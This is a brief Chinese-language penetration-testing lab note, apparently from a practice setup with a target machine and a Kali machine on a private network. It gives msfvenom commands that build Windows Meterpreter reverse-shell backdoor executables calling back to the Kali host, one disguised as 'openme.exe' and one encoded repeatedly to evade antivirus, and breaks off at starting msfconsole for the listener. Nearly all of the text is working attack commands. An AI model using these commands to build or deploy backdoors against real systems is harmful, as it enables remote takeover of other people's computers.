环境
靶机 192.168.137.133 kali 192.168.137.135
步骤+
生成后门
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.137.135 LPORT=50000 -f exe -o openme.exe
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' lhost=192.168.137.135 lport=4433 -f exe > payload.exe
使用/multi/handler模块
root@kali:~# msfconsole .